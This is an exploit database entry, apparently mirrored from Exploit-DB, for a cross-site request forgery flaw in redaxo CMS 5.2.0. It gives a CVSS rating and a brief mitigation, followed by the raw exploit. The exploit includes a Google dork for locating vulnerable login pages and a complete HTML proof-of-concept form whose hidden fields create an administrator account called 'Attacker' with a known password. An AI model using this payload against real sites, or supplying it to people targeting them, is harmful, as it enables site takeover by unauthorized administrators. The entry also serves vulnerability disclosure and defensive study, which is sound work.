redaxo CMS CSRF(Add Admin)

vendor:

redaxo CMS

by:

Ashiyane Digital Security Team

8,8

CVSS

HIGH

Cross-Site Request Forgery (CSRF)

352

CWE

Product Name: redaxo CMS

Affected Version From: 5.2

Affected Version To: 5.2

Patch Exists: NO

Related CWE: N/A

CPE: a:redaxo:redaxo:5.2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: PHP

2016

A Cross-Site Request Forgery (CSRF) vulnerability exists in redaxo CMS 5.2.0, which allows an attacker to add an admin user by sending a malicious request. The attacker can craft a malicious HTML page containing a form with hidden fields, which when visited by an authenticated user, will submit the form and add an admin user with the credentials specified in the form.

Mitigation:

The application should verify that the request is coming from an authenticated user and not from an external source.

Source

Exploit-DB raw data:

# Exploit Title : redaxo CMS CSRF(Add Admin)
# Author : Ashiyane Digital Security Team
# Google Dork : intitle:Login · REDAXO
# Date :  1/11/2016
# Type : webapps
# Platform : PHP
# Vendor Homepage : http://www.redaxo.org/
# Software link :http://www.redaxo.org/de/download/file/?f=redaxo_5.2.0.zip
# Version : 5.2(latest)
#######################################################3
admin user : Attacker
admin password : 123456
<html>
  <!-- CSRF PoC  -->
  <body>
    <form name="form0" action="http://localhost/redaxo_5.2.0/redaxo/index.php?page=users/users" method="POST">
      <input type="hidden" name="userlogin" value="Attacker" /> //  username
      <input type="hidden" name="username" value="Attacker" />
      <input type="hidden" name="userdesc" value="Atacker" />
      <input type="hidden" name="useremail" value="hhhhh@hhh.com" />// email
      <input type="hidden" name="useradmin" value="1" />
      <input type="hidden" name="userstatus" value="1" />
      <input type="hidden" name="userperm_be_sprache" value="en_gb" />
      <input type="hidden" name="userpsw" value="7c4a8d09ca3762af61e59520943dc26494f8941b" /> //123456
      <input type="hidden" name="function" value="1" />
      <input type="hidden" name="FUNC_ADD" value="1" />
      <input type="hidden" name="save" value="1" />
      <input type="hidden" name="javascript" value="1" />
      <input type="submit" name="submit_pass" value="Save" />
    </form>
  </body>
</html>

####################################################
######### exploit by: Amir.ght #####################
####################################################